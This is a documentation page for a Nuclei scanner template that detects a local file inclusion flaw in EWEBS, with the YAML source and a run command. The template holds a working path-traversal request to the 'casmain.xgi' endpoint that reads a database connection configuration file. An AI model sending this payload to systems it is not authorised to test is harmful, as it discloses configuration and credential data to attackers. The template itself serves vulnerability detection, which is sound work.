EWEBS - Local File Inclusion
ID: ewebs-arbitrary-file-reading
Severity: high
Author: pikpikcu
Tags: ewebs,lfi
Description
Section titled “Description”EWEBS is vulnerable to local file inclusion and allows remote attackers to disclose the content of locally stored files via the ‘Language_S’ parameter supplied to the ‘casmain.xgi’ endpoint.
YAML Source
Section titled “YAML Source”id: ewebs-arbitrary-file-reading
info: name: EWEBS - Local File Inclusion author: pikpikcu severity: high description: EWEBS is vulnerable to local file inclusion and allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter supplied to the 'casmain.xgi' endpoint. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: ewebs,lfi
http: - method: POST path: - '{{BaseURL}}/casmain.xgi'
headers: Content-Type: application/x-www-form-urlencoded
body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"
matchers-condition: and matchers: - type: word words: - "[Edition]" - "[LocalInfo]" condition: and part: body
- type: status status: - 200# digest: 4a0a004730450221008bff81c1c541c38b6d399737ddc034521dabed49e0b307261b3af5d423440a6602201c66535f3c911901750a5bacd0b3026bc57d2e86295598510ccf42cf08c7d74d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml"